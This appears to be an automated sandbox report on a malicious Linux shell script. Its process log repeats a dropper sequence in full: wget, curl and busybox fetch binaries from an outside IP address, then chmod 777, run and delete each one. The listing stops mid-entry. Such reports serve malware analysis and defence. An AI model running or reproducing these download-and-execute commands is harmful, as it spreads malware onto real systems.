Analysis Overview
SHA256
d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76
Threat Level: Shows suspicious behavior
The file d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 03:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 03:36
Reported
2024-11-20 03:39
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
7s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | N/A |
| N/A | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | N/A |
| N/A | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | N/A |
| N/A | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | N/A |
| N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | N/A |
| N/A | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | N/A |
| N/A | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | N/A |
| N/A | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | N/A |
| N/A | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | N/A |
| N/A | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | N/A |
| N/A | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | N/A |
| N/A | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | N/A |
| N/A | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | N/A |
| N/A | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | N/A |
| N/A | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | N/A |
| N/A | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | N/A |
| N/A | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | N/A |
| N/A | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | N/A |
| N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | N/A |
| N/A | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | N/A |
| N/A | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | N/A |
| N/A | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | N/A |
| N/A | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | N/A |
| N/A | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | N/A |
| N/A | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | N/A |
| N/A | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /usr/bin/curl | N/A |
Processes
/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/wget
[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/chmod
[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/rm
[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/wget
[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/chmod
[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/rm
[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/wget
[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/chmod
[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/rm
[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/wget
[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/chmod
[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/rm
[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/wget
[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/chmod
[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/rm
[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/wget
[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/chmod
[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/rm
[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/wget
[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/chmod
[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/rm
[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/wget
[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/chmod
[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/rm
[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/chmod
[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/rm
[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/wget
[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/chmod
[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/rm
[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/wget
[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/chmod
[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/rm
[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/wget
[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/chmod
[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/rm
[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/wget
[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/chmod
[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/rm
[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/wget
[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/chmod
[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/rm
[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/wget
[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/wget
[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/chmod
[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/rm
[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/wget
[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/chmod
[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/rm
[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/wget
[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/chmod
[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/rm
[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/wget
[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/chmod
[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/rm
[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/wget
[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/chmod
[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/rm
[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/wget
[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/chmod
[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/rm
[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/wget
[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/chmod
[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/rm
[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/chmod
[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/rm
[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/wget
[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/chmod
[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/rm
[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/wget
[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/chmod
[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/rm
[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/wget
[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/curl
